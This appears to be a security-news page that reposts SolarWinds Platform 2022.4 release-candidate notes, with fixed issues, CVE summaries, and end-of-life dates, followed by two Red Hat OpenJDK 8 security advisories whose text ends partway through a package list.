Users with Node Management rights were able to view and edit all nodes due to Insufficient control on URL parameter causing insecure direct object reference (IDOR) vulnerability in SolarWinds Platform 2022.3 and previous.

**SolarWinds Platform RC documentation** - The following content is a draft for a **SolarWinds Platform Release Candidate**. All content subject to change. Some links might not function yet.

RC date: October 19, 2022

These release notes describe the new features, improvements, and fixed issues in SolarWinds Platform 2022.4. They also provide information about upgrades and describe workarounds for known issues.

Learn more

*   For information on latest hotfixes, see SolarWinds Platform Hotfixes.
*   For release notes for previous SolarWinds Platform versions, see Previous Version documentation.
*   For information about requirements, see SolarWinds Platform 2022.4 System Requirements.
*   For information about working with the SolarWinds Platform, see the SolarWinds Platform Administrator Guide.

**New features and improvements in SolarWinds Platform**

Return to top

SolarWinds Platform 2022.4 offers the following improvements compared to previous releases of SolarWinds Platform.

*   SolarWinds Platform 2022.4 provides SWIS Verbs for managing common credentials, such as Orion.Credential.CreateCredentials & Orion.Credential.UpdateCredentials for creating/editing the credentials.
    
*   SolarWinds Platform 2022.4 supports the Kerberos protocol for WMI authentication.
    

**New customer installation**

Return to top

For information about installing SolarWinds Platform, see SolarWinds Installer.

**How to upgrade**

Use the SolarWinds Installer to upgrade your entire SolarWinds Platform deployment (all SolarWinds Platform products and any scalability engines) to the current versions.

You must be on Orion Platform 2020.2.1 or later to upgrade to SolarWinds Platform 2022.4. If you are on Orion Platform 2019.4 or earlier, first upgrade to 2020.2.6 and then upgrade to SolarWinds Platform 2022.4.

**Before you upgrade from 2020.2.x**

*   Before upgrading from Orion Platform 2020.2.6 and earlier to SolarWinds Platform 2022.3 or later, make sure the database user you use to connect to your SQL Server has the **db create** privilege. **Without this privilege, the upgrade will not complete.**
    
*   Legacy syslog and traps functionality has been retired and replaced with new log analysis functionality. Currently configured legacy rules and history will automatically be migrated during the upgrade.
*   Some upgrade situations from the Orion Platform to the SolarWinds Platform are not supported and the installer will stop the upgrade automatically.
    *   If you have a SQL Server older than 2016.
    *   If you have an Orion Platform product version 2019.4 or earlier.

**Fixed issues**

Return to top

SolarWinds Platform 2022.3 fixes the following issues.

 

Case Number

Description

614891, 787724, 980418, 986820

The issue where last month data was not interpreted correctly in PerfStack was addressed.

614233, 762559, 804478, 837222, 899624, 920603, 933885, 942223, 1059644, 1169810, 1171661, 1179118

The issue where report schedules with SAML accounts could not be created was addressed.

683517, 875616

The issue where Centralized Upgrade did not work with a proxy was resolved.

1067814, 1151313

The issue where the child status participation in node status was incorrect in fast polls was addressed.

936171, 946582, 1067460, 1131341

The issues with bulk assigning values on filtered rows were addressed.

802569

The issue where JobEngine Workers started slowly on computers without Internet access was addressed.

1144845, 1161775

The issue where configuration failed when installation location changed was addressed.

233154, 319006, 328477, 458287, 688246

The issues with CredentialManagerService slow methods were addressed.

778743

The issue where a Nexus switch was incorrectly recognized as Cisco was addressed.

973342, 977343

The issue where machine types for Cisco devices were only recognized as Cisco was addressed.

1102730

The issue where child status was not updated properly was addressed.

949509

The issue where collector log was flooded when processing Agent Node uptime was addressed.

761222

The unhandled exception in the Poller Checker tool was addressed.

1187140

The issue where the HA service stopped after the upgrade was addressed.

1187140

The issue where Observability templates were not delivered to the system was addressed.

636868

The issue where database maintenance failed to execute a procedure were addressed.

1144505

The issue where database maintenance job completed with errors caused by calling a legacy procedure was addressed.

928393

The issues with OIDs for Antaira Technologies, LLC and corresponding icons were addressed.

554483, 692820

The issue where main poller was used on bulk actions from Node Management for sending any requests to nodes was addressed.

893718

The issue where capacity forecast for CPU/memory was not calculated was addressed.

1184046

The issue where scalability engines installation failed because of a free tool installed in the SolarWinds folder was addressed.

**CVEs**

SolarWinds would like to thank our Security Researchers below for reporting on the issue in a responsible manner and working with our security, product, and engineering teams to fix the vulnerability.

    

CVE-ID

Vulnerability Title

Description

Severity

Credit

CVE-2022-36966

Insecure Direct Object Reference Vulnerability

Users with Node Management rights were able to view and edit all nodes due to Insufficient control on URL parameter causing insecure direct object reference (IDOR) vulnerability in SolarWinds Platform 2022.3.

5.9 Medium

Asim Liaquat

CVE-2022-36957

SolarWinds Platform Deserialization of Untrusted Data

This vulnerability allows a remote adversary with Orion admin-level account access to SolarWinds Web Console to execute arbitrary commands on the Main Poller of affected versions of the SolarWinds Platform.

7.2 High

Piotr Bazydlo (@chudypb) of Trend Micro Zero Day Initiative

CVE-2022-36958

SolarWinds Platform Deserialization of Untrusted Data

This vulnerability allows a remote adversary with valid access to SolarWinds Web Console to execute arbitrary commands on the Main Poller of affected versions of the SolarWinds Platform.

8.8 High

Piotr Bazydlo (@chudypb) of Trend Micro Zero Day Initiative

CVE-2022-38108

SolarWinds Platform Deserialization of Untrusted Data

This vulnerability allows a remote adversary with Orion admin-level account access to SolarWinds Web Console to execute arbitrary commands on the Main Poller of affected versions of the SolarWinds Platform.

7.2 High

Piotr Bazydlo (@chudypb) of Trend Micro Zero Day Initiative

**End of life**

Return to top

For modules based on Orion Platform 2020.2.6 and earlier, SolarWinds is announcing future end-of-life plans for your convenience. As always, SolarWinds recommends you upgrade to the latest version of your products at your earliest convenience.

   

Version

EOL Announcements

EOE Effective Dates

EOL Effective Dates

2020.2.6

**April 18, 2023**: End-of-Life (EoL) announcement – Customers on SolarWinds Platform 2020.2.6 should begin transitioning to the latest version of SolarWinds Platform.

**May 18, 2023**: End-of-Engineering (EoE) – Service releases, bug fixes, workarounds, and service packs for SolarWinds Platform 2020.2.6 will no longer be actively supported by SolarWinds.

**May 18, 2024**: End-of-Life (EoL) – SolarWinds will no longer provide technical support for SolarWinds Platform 2020.2.6

2020.2.5

**January 18, 2023**: End-of-Life (EoL) announcement – Customers on SolarWinds Platform 2020.2.5 should begin transitioning to the latest version of SolarWinds Platform.

**February 17, 2023**: End-of-Engineering (EoE) – Service releases, bug fixes, workarounds, and service packs for SolarWinds Platform 2020.2.5 will no longer be actively supported by SolarWinds.

**February 17, 2024**: End-of-Life (EoL) – SolarWinds will no longer provide technical support for SolarWinds Platform 2020.2.5.

2020.2.4

**October 19, 2022**: End-of-Life (EoL) announcement – Customers on SolarWinds Platform 2020.2.4 should begin transitioning to the latest version of SolarWinds Platform.

**November 18, 2022**: End-of-Engineering (EoE) – Service releases, bug fixes, workarounds, and service packs for SolarWinds Platform 2020.2.4 will no longer be actively supported by SolarWinds.

**November 18, 2023**: End-of-Life (EoL) – SolarWinds will no longer provide technical support for SolarWinds Platform 2020.2.4.

2020.2.1

**October 19, 2022**: End-of-Life (EoL) announcement – Customers on SolarWinds Platform 2020.2.1 should begin transitioning to the latest version of SolarWinds Platform.

**November 18, 2022**: End-of-Engineering (EoE) – Service releases, bug fixes, workarounds, and service packs for SolarWinds Platform 2020.2.1 will no longer be actively supported by SolarWinds.

**November 18, 2023**: End-of-Life (EoL) – SolarWinds will no longer provide technical support for SolarWinds Platform 2020.2.1.

2020.2

**October 19, 2022**: End-of-Life (EoL) announcement – Customers on NSolarWinds Platform 2020.2 should begin transitioning to the latest version of SolarWinds Platform.

**November 18, 2022**: End-of-Engineering (EoE) – Service releases, bug fixes, workarounds, and service packs for SolarWinds Platform 2020.2 will no longer be actively supported by SolarWinds.

**November 18, 2023**: End-of-Life (EoL) – SolarWinds will no longer provide technical support for SolarWinds Platform 2020.2.

See the End of Life Policy for information about SolarWinds product lifecycle phases. For supported versions and EoL announcements for all SolarWinds products, see Currently supported software versions.

**End of support**

Return to top

This version of SolarWinds Platform no longer supports the following platforms and features.

 

Type

Details

Microsoft Windows Server 2012 R2

Windows Server 2012 R2 is not supported in SolarWinds Platform 2022.4.

SolarWinds recommends that you upgrade the operating system of your SolarWinds Platform server to Windows Server 2016 or later. See SolarWinds Platform 2022.4 System Requirements.

**Legal notices**

Return to top

© 2022 SolarWinds Worldwide, LLC. All rights reserved.

This document may not be reproduced by any means nor modified, decompiled, disassembled, published or distributed, in whole or in part, or translated to any electronic medium or other means without the prior written consent of SolarWinds. All right, title, and interest in and to the software, services, and documentation are and shall remain the exclusive property of SolarWinds, its affiliates, and/or its respective licensors.

SOLARWINDS DISCLAIMS ALL WARRANTIES, CONDITIONS, OR OTHER TERMS, EXPRESS OR IMPLIED, STATUTORY OR OTHERWISE, ON THE DOCUMENTATION, INCLUDING WITHOUT LIMITATION NONINFRINGEMENT, ACCURACY, COMPLETENESS, OR USEFULNESS OF ANY INFORMATION CONTAINED HEREIN. IN NO EVENT SHALL SOLARWINDS, ITS SUPPLIERS, NOR ITS LICENSORS BE LIABLE FOR ANY DAMAGES, WHETHER ARISING IN TORT, CONTRACT OR ANY OTHER LEGAL THEORY, EVEN IF SOLARWINDS HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.

The SolarWinds, SolarWinds & Design, Orion, and THWACK trademarks are the exclusive property of SolarWinds Worldwide, LLC or its affiliates, are registered with the U.S. Patent and Trademark Office, and may be registered or pending registration in other countries. All other SolarWinds trademarks, service marks, and logos may be common law marks or are registered or pending registration. All other trademarks mentioned herein are used for identification purposes only and are trademarks of (and may be registered trademarks) of their respective companies.

CVE-2022-36966: SolarWinds Platform 2022.4  Release Notes

Red Hat Security Advisory 2022-7005-01 - The java-1.8.0-openjdk packages provide the OpenJDK 8 Java Runtime Environment and the OpenJDK 8 Java Software Development Kit. Issues addressed include a randomization vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: java-1.8.0-openjdk security update  
Advisory ID:       RHSA-2022:7005-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:7005  
Issue date:        2022-10-19  
CVE Names:         CVE-2022-21619 CVE-2022-21624 CVE-2022-21626  
                   CVE-2022-21628  
====================================================================  
1. Summary:

An update for java-1.8.0-openjdk is now available for Red Hat Enterprise  
Linux 8.4 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat CodeReady Linux Builder EUS (v. 8.4) - aarch64, ppc64le, x86_64  
Red Hat Enterprise Linux AppStream EUS (v.8.4) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

The java-1.8.0-openjdk packages provide the OpenJDK 8 Java Runtime  
Environment and the OpenJDK 8 Java Software Development Kit.

Security Fix(es):

* OpenJDK: excessive memory allocation in X.509 certificate parsing  
(Security, 8286533) (CVE-2022-21626)

* OpenJDK: HttpServer no connection count limit (Lightweight HTTP Server,  
8286918) (CVE-2022-21628)

* OpenJDK: improper handling of long NTLM client hostnames (Security,  
8286526) (CVE-2022-21619)

* OpenJDK: insufficient randomization of JNDI DNS port numbers (JNDI,  
8286910) (CVE-2022-21624)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of OpenJDK Java must be restarted for this update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2133745 - CVE-2022-21619 OpenJDK: improper handling of long NTLM client hostnames (Security, 8286526)  
2133753 - CVE-2022-21626 OpenJDK: excessive memory allocation in X.509 certificate parsing (Security, 8286533)  
2133765 - CVE-2022-21624 OpenJDK: insufficient randomization of JNDI DNS port numbers (JNDI, 8286910)  
2133769 - CVE-2022-21628 OpenJDK: HttpServer no connection count limit (Lightweight HTTP Server, 8286918)

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.8.4):

Source:  
java-1.8.0-openjdk-1.8.0.352.b08-2.el8_4.src.rpm

aarch64:  
java-1.8.0-openjdk-1.8.0.352.b08-2.el8_4.aarch64.rpm  
java-1.8.0-openjdk-accessibility-1.8.0.352.b08-2.el8_4.aarch64.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.352.b08-2.el8_4.aarch64.rpm  
java-1.8.0-openjdk-debugsource-1.8.0.352.b08-2.el8_4.aarch64.rpm  
java-1.8.0-openjdk-demo-1.8.0.352.b08-2.el8_4.aarch64.rpm  
java-1.8.0-openjdk-demo-debuginfo-1.8.0.352.b08-2.el8_4.aarch64.rpm  
java-1.8.0-openjdk-demo-slowdebug-debuginfo-1.8.0.352.b08-2.el8_4.aarch64.rpm  
java-1.8.0-openjdk-devel-1.8.0.352.b08-2.el8_4.aarch64.rpm  
java-1.8.0-openjdk-devel-debuginfo-1.8.0.352.b08-2.el8_4.aarch64.rpm  
java-1.8.0-openjdk-devel-slowdebug-debuginfo-1.8.0.352.b08-2.el8_4.aarch64.rpm  
java-1.8.0-openjdk-headless-1.8.0.352.b08-2.el8_4.aarch64.rpm  
java-1.8.0-openjdk-headless-debuginfo-1.8.0.352.b08-2.el8_4.aarch64.rpm  
java-1.8.0-openjdk-headless-slowdebug-debuginfo-1.8.0.352.b08-2.el8_4.aarch64.rpm  
java-1.8.0-openjdk-slowdebug-debuginfo-1.8.0.352.b08-2.el8_4.aarch64.rpm  
java-1.8.0-openjdk-src-1.8.0.352.b08-2.el8_4.aarch64.rpm

noarch:  
java-1.8.0-openjdk-javadoc-1.8.0.352.b08-2.el8_4.noarch.rpm  
java-1.8.0-openjdk-javadoc-zip-1.8.0.352.b08-2.el8_4.noarch.rpm

ppc64le:  
java-1.8.0-openjdk-1.8.0.352.b08-2.el8_4.ppc64le.rpm  
java-1.8.0-openjdk-accessibility-1.8.0.352.b08-2.el8_4.ppc64le.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.352.b08-2.el8_4.ppc64le.rpm  
java-1.8.0-openjdk-debugsource-1.8.0.352.b08-2.el8_4.ppc64le.rpm  
java-1.8.0-openjdk-demo-1.8.0.352.b08-2.el8_4.ppc64le.rpm  
java-1.8.0-openjdk-demo-debuginfo-1.8.0.352.b08-2.el8_4.ppc64le.rpm  
java-1.8.0-openjdk-demo-slowdebug-debuginfo-1.8.0.352.b08-2.el8_4.ppc64le.rpm  
java-1.8.0-openjdk-devel-1.8.0.352.b08-2.el8_4.ppc64le.rpm  
java-1.8.0-openjdk-devel-debuginfo-1.8.0.352.b08-2.el8_4.ppc64le.rpm  
java-1.8.0-openjdk-devel-slowdebug-debuginfo-1.8.0.352.b08-2.el8_4.ppc64le.rpm  
java-1.8.0-openjdk-headless-1.8.0.352.b08-2.el8_4.ppc64le.rpm  
java-1.8.0-openjdk-headless-debuginfo-1.8.0.352.b08-2.el8_4.ppc64le.rpm  
java-1.8.0-openjdk-headless-slowdebug-debuginfo-1.8.0.352.b08-2.el8_4.ppc64le.rpm  
java-1.8.0-openjdk-slowdebug-debuginfo-1.8.0.352.b08-2.el8_4.ppc64le.rpm  
java-1.8.0-openjdk-src-1.8.0.352.b08-2.el8_4.ppc64le.rpm

s390x:  
java-1.8.0-openjdk-1.8.0.352.b08-2.el8_4.s390x.rpm  
java-1.8.0-openjdk-accessibility-1.8.0.352.b08-2.el8_4.s390x.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.352.b08-2.el8_4.s390x.rpm  
java-1.8.0-openjdk-debugsource-1.8.0.352.b08-2.el8_4.s390x.rpm  
java-1.8.0-openjdk-demo-1.8.0.352.b08-2.el8_4.s390x.rpm  
java-1.8.0-openjdk-demo-debuginfo-1.8.0.352.b08-2.el8_4.s390x.rpm  
java-1.8.0-openjdk-devel-1.8.0.352.b08-2.el8_4.s390x.rpm  
java-1.8.0-openjdk-devel-debuginfo-1.8.0.352.b08-2.el8_4.s390x.rpm  
java-1.8.0-openjdk-headless-1.8.0.352.b08-2.el8_4.s390x.rpm  
java-1.8.0-openjdk-headless-debuginfo-1.8.0.352.b08-2.el8_4.s390x.rpm  
java-1.8.0-openjdk-src-1.8.0.352.b08-2.el8_4.s390x.rpm

x86_64:  
java-1.8.0-openjdk-1.8.0.352.b08-2.el8_4.x86_64.rpm  
java-1.8.0-openjdk-accessibility-1.8.0.352.b08-2.el8_4.x86_64.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.352.b08-2.el8_4.x86_64.rpm  
java-1.8.0-openjdk-debugsource-1.8.0.352.b08-2.el8_4.x86_64.rpm  
java-1.8.0-openjdk-demo-1.8.0.352.b08-2.el8_4.x86_64.rpm  
java-1.8.0-openjdk-demo-debuginfo-1.8.0.352.b08-2.el8_4.x86_64.rpm  
java-1.8.0-openjdk-demo-fastdebug-debuginfo-1.8.0.352.b08-2.el8_4.x86_64.rpm  
java-1.8.0-openjdk-demo-slowdebug-debuginfo-1.8.0.352.b08-2.el8_4.x86_64.rpm  
java-1.8.0-openjdk-devel-1.8.0.352.b08-2.el8_4.x86_64.rpm  
java-1.8.0-openjdk-devel-debuginfo-1.8.0.352.b08-2.el8_4.x86_64.rpm  
java-1.8.0-openjdk-devel-fastdebug-debuginfo-1.8.0.352.b08-2.el8_4.x86_64.rpm  
java-1.8.0-openjdk-devel-slowdebug-debuginfo-1.8.0.352.b08-2.el8_4.x86_64.rpm  
java-1.8.0-openjdk-fastdebug-debuginfo-1.8.0.352.b08-2.el8_4.x86_64.rpm  
java-1.8.0-openjdk-headless-1.8.0.352.b08-2.el8_4.x86_64.rpm  
java-1.8.0-openjdk-headless-debuginfo-1.8.0.352.b08-2.el8_4.x86_64.rpm  
java-1.8.0-openjdk-headless-fastdebug-debuginfo-1.8.0.352.b08-2.el8_4.x86_64.rpm  
java-1.8.0-openjdk-headless-slowdebug-debuginfo-1.8.0.352.b08-2.el8_4.x86_64.rpm  
java-1.8.0-openjdk-slowdebug-debuginfo-1.8.0.352.b08-2.el8_4.x86_64.rpm  
java-1.8.0-openjdk-src-1.8.0.352.b08-2.el8_4.x86_64.rpm

Red Hat CodeReady Linux Builder EUS (v. 8.4):

aarch64:  
java-1.8.0-openjdk-accessibility-slowdebug-1.8.0.352.b08-2.el8_4.aarch64.rpm  
java-1.8.0-openjdk-debugsource-1.8.0.352.b08-2.el8_4.aarch64.rpm  
java-1.8.0-openjdk-demo-slowdebug-1.8.0.352.b08-2.el8_4.aarch64.rpm  
java-1.8.0-openjdk-demo-slowdebug-debuginfo-1.8.0.352.b08-2.el8_4.aarch64.rpm  
java-1.8.0-openjdk-devel-slowdebug-1.8.0.352.b08-2.el8_4.aarch64.rpm  
java-1.8.0-openjdk-devel-slowdebug-debuginfo-1.8.0.352.b08-2.el8_4.aarch64.rpm  
java-1.8.0-openjdk-headless-slowdebug-1.8.0.352.b08-2.el8_4.aarch64.rpm  
java-1.8.0-openjdk-headless-slowdebug-debuginfo-1.8.0.352.b08-2.el8_4.aarch64.rpm  
java-1.8.0-openjdk-slowdebug-1.8.0.352.b08-2.el8_4.aarch64.rpm  
java-1.8.0-openjdk-slowdebug-debuginfo-1.8.0.352.b08-2.el8_4.aarch64.rpm  
java-1.8.0-openjdk-src-slowdebug-1.8.0.352.b08-2.el8_4.aarch64.rpm

ppc64le:  
java-1.8.0-openjdk-accessibility-slowdebug-1.8.0.352.b08-2.el8_4.ppc64le.rpm  
java-1.8.0-openjdk-debugsource-1.8.0.352.b08-2.el8_4.ppc64le.rpm  
java-1.8.0-openjdk-demo-slowdebug-1.8.0.352.b08-2.el8_4.ppc64le.rpm  
java-1.8.0-openjdk-demo-slowdebug-debuginfo-1.8.0.352.b08-2.el8_4.ppc64le.rpm  
java-1.8.0-openjdk-devel-slowdebug-1.8.0.352.b08-2.el8_4.ppc64le.rpm  
java-1.8.0-openjdk-devel-slowdebug-debuginfo-1.8.0.352.b08-2.el8_4.ppc64le.rpm  
java-1.8.0-openjdk-headless-slowdebug-1.8.0.352.b08-2.el8_4.ppc64le.rpm  
java-1.8.0-openjdk-headless-slowdebug-debuginfo-1.8.0.352.b08-2.el8_4.ppc64le.rpm  
java-1.8.0-openjdk-slowdebug-1.8.0.352.b08-2.el8_4.ppc64le.rpm  
java-1.8.0-openjdk-slowdebug-debuginfo-1.8.0.352.b08-2.el8_4.ppc64le.rpm  
java-1.8.0-openjdk-src-slowdebug-1.8.0.352.b08-2.el8_4.ppc64le.rpm

x86_64:  
java-1.8.0-openjdk-accessibility-fastdebug-1.8.0.352.b08-2.el8_4.x86_64.rpm  
java-1.8.0-openjdk-accessibility-slowdebug-1.8.0.352.b08-2.el8_4.x86_64.rpm  
java-1.8.0-openjdk-debugsource-1.8.0.352.b08-2.el8_4.x86_64.rpm  
java-1.8.0-openjdk-demo-fastdebug-1.8.0.352.b08-2.el8_4.x86_64.rpm  
java-1.8.0-openjdk-demo-fastdebug-debuginfo-1.8.0.352.b08-2.el8_4.x86_64.rpm  
java-1.8.0-openjdk-demo-slowdebug-1.8.0.352.b08-2.el8_4.x86_64.rpm  
java-1.8.0-openjdk-demo-slowdebug-debuginfo-1.8.0.352.b08-2.el8_4.x86_64.rpm  
java-1.8.0-openjdk-devel-fastdebug-1.8.0.352.b08-2.el8_4.x86_64.rpm  
java-1.8.0-openjdk-devel-fastdebug-debuginfo-1.8.0.352.b08-2.el8_4.x86_64.rpm  
java-1.8.0-openjdk-devel-slowdebug-1.8.0.352.b08-2.el8_4.x86_64.rpm  
java-1.8.0-openjdk-devel-slowdebug-debuginfo-1.8.0.352.b08-2.el8_4.x86_64.rpm  
java-1.8.0-openjdk-fastdebug-1.8.0.352.b08-2.el8_4.x86_64.rpm  
java-1.8.0-openjdk-fastdebug-debuginfo-1.8.0.352.b08-2.el8_4.x86_64.rpm  
java-1.8.0-openjdk-headless-fastdebug-1.8.0.352.b08-2.el8_4.x86_64.rpm  
java-1.8.0-openjdk-headless-fastdebug-debuginfo-1.8.0.352.b08-2.el8_4.x86_64.rpm  
java-1.8.0-openjdk-headless-slowdebug-1.8.0.352.b08-2.el8_4.x86_64.rpm  
java-1.8.0-openjdk-headless-slowdebug-debuginfo-1.8.0.352.b08-2.el8_4.x86_64.rpm  
java-1.8.0-openjdk-slowdebug-1.8.0.352.b08-2.el8_4.x86_64.rpm  
java-1.8.0-openjdk-slowdebug-debuginfo-1.8.0.352.b08-2.el8_4.x86_64.rpm  
java-1.8.0-openjdk-src-fastdebug-1.8.0.352.b08-2.el8_4.x86_64.rpm  
java-1.8.0-openjdk-src-slowdebug-1.8.0.352.b08-2.el8_4.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-21619  
https://access.redhat.com/security/cve/CVE-2022-21624  
https://access.redhat.com/security/cve/CVE-2022-21626  
https://access.redhat.com/security/cve/CVE-2022-21628  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY1C45tzjgjWX9erEAQgeBA/+Jg4lDZYbAiH1xNPGqwJQdaDuPADdtKyB  
+G4CNz7mJ5/IHS+IjupRL2vuAybdGmd3sI2Mu6pI4dcEPPQ/mI/ub7jvmQPMJH0D  
9rwIWUqwfuDvPWHjskVWazUJHtTGwoRiFXacOUDtCmr4QS4ZhfVz1HYkmZoiIJiN  
11rU0pLnEcQi60Di+5rDl3rokCT5qlVLghaS5yPawdga9r88SWZBkcsQlYdUBdtj  
CaQVhzyBlf9LZkpVE+TI9DYSTpSvFxW8i8HRJb+YEdO2Ka5zod16wPmYbWkfmy5n  
3kfqkxHIJoiH8MLenaWvHMHsU36RQLYdfdnDFlyDSX53dN90EjRx52WwaSpt4UAb  
U3wRkm+b26BgdG74vD+QybPniLbw4RrHZbFCoDwcMQf/6UNXtA8N9jTP6mXNE/DB  
JDI1yl976P4Q1DWBI0ehRhF9v5WgU//smrjgj7pyPrvA2cqGK59zgdwKQP/b2G44  
ZX5ZiI7Fcyxnvyubuy9HyGBO4NBv7gb7x0j4jxk6AVxSeSdQ+Go4zNHSSN7W4sW7  
hLpao+PpYssg/woSOYo5c8/ivYaMLMdr7g4CsmuuDOXhjlvv96JEkv5LRgHJA6QB  
sOkDgCRXxrR+qQRESukB4G+wxgzCzr7MovofYNtqBAAk3MRbkIdUWaEirFGYEW55  
dX4Zb3IP+M0=T1In  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-7005-01

Red Hat Security Advisory 2022-7006-01 - The java-1.8.0-openjdk packages provide the OpenJDK 8 Java Runtime Environment and the OpenJDK 8 Java Software Development Kit. Issues addressed include a randomization vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: java-1.8.0-openjdk security update  
Advisory ID:       RHSA-2022:7006-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:7006  
Issue date:        2022-10-19  
CVE Names:         CVE-2022-21619 CVE-2022-21624 CVE-2022-21626  
                   CVE-2022-21628  
====================================================================  
1. Summary:

An update for java-1.8.0-openjdk is now available for Red Hat Enterprise  
Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat CodeReady Linux Builder (v. 8) - aarch64, ppc64le, x86_64  
Red Hat Enterprise Linux AppStream (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

The java-1.8.0-openjdk packages provide the OpenJDK 8 Java Runtime  
Environment and the OpenJDK 8 Java Software Development Kit.

Security Fix(es):

* OpenJDK: excessive memory allocation in X.509 certificate parsing  
(Security, 8286533) (CVE-2022-21626)

* OpenJDK: HttpServer no connection count limit (Lightweight HTTP Server,  
8286918) (CVE-2022-21628)

* OpenJDK: improper handling of long NTLM client hostnames (Security,  
8286526) (CVE-2022-21619)

* OpenJDK: insufficient randomization of JNDI DNS port numbers (JNDI,  
8286910) (CVE-2022-21624)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of OpenJDK Java must be restarted for this update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2133745 - CVE-2022-21619 OpenJDK: improper handling of long NTLM client hostnames (Security, 8286526)  
2133753 - CVE-2022-21626 OpenJDK: excessive memory allocation in X.509 certificate parsing (Security, 8286533)  
2133765 - CVE-2022-21624 OpenJDK: insufficient randomization of JNDI DNS port numbers (JNDI, 8286910)  
2133769 - CVE-2022-21628 OpenJDK: HttpServer no connection count limit (Lightweight HTTP Server, 8286918)

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
java-1.8.0-openjdk-1.8.0.352.b08-2.el8_6.src.rpm

aarch64:  
java-1.8.0-openjdk-1.8.0.352.b08-2.el8_6.aarch64.rpm  
java-1.8.0-openjdk-accessibility-1.8.0.352.b08-2.el8_6.aarch64.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.352.b08-2.el8_6.aarch64.rpm  
java-1.8.0-openjdk-debugsource-1.8.0.352.b08-2.el8_6.aarch64.rpm  
java-1.8.0-openjdk-demo-1.8.0.352.b08-2.el8_6.aarch64.rpm  
java-1.8.0-openjdk-demo-debuginfo-1.8.0.352.b08-2.el8_6.aarch64.rpm  
java-1.8.0-openjdk-devel-1.8.0.352.b08-2.el8_6.aarch64.rpm  
java-1.8.0-openjdk-devel-debuginfo-1.8.0.352.b08-2.el8_6.aarch64.rpm  
java-1.8.0-openjdk-headless-1.8.0.352.b08-2.el8_6.aarch64.rpm  
java-1.8.0-openjdk-headless-debuginfo-1.8.0.352.b08-2.el8_6.aarch64.rpm  
java-1.8.0-openjdk-src-1.8.0.352.b08-2.el8_6.aarch64.rpm

noarch:  
java-1.8.0-openjdk-javadoc-1.8.0.352.b08-2.el8_6.noarch.rpm  
java-1.8.0-openjdk-javadoc-zip-1.8.0.352.b08-2.el8_6.noarch.rpm

ppc64le:  
java-1.8.0-openjdk-1.8.0.352.b08-2.el8_6.ppc64le.rpm  
java-1.8.0-openjdk-accessibility-1.8.0.352.b08-2.el8_6.ppc64le.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.352.b08-2.el8_6.ppc64le.rpm  
java-1.8.0-openjdk-debugsource-1.8.0.352.b08-2.el8_6.ppc64le.rpm  
java-1.8.0-openjdk-demo-1.8.0.352.b08-2.el8_6.ppc64le.rpm  
java-1.8.0-openjdk-demo-debuginfo-1.8.0.352.b08-2.el8_6.ppc64le.rpm  
java-1.8.0-openjdk-devel-1.8.0.352.b08-2.el8_6.ppc64le.rpm  
java-1.8.0-openjdk-devel-debuginfo-1.8.0.352.b08-2.el8_6.ppc64le.rpm  
java-1.8.0-openjdk-headless-1.8.0.352.b08-2.el8_6.ppc64le.rpm  
java-1.8.0-openjdk-headless-debuginfo-1.8.0.352.b08-2.el8_6.ppc64le.rpm  
java-1.8.0-openjdk-src-1.8.0.352.b08-2.el8_6.ppc64le.rpm

s390x:  
java-1.8.0-openjdk-1.8.0.352.b08-2.el8_6.s390x.rpm  
java-1.8.0-openjdk-accessibility-1.8.0.352.b08-2.el8_6.s390x.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.352.b08-2.el8_6.s390x.rpm  
java-1.8.0-openjdk-debugsource-1.8.0.352.b08-2.el8_6.s390x.rpm  
java-1.8.0-openjdk-demo-1.8.0.352.b08-2.el8_6.s390x.rpm  
java-1.8.0-openjdk-demo-debuginfo-1.8.0.352.b08-2.el8_6.s390x.rpm  
java-1.8.0-openjdk-devel-1.8.0.352.b08-2.el8_6.s390x.rpm  
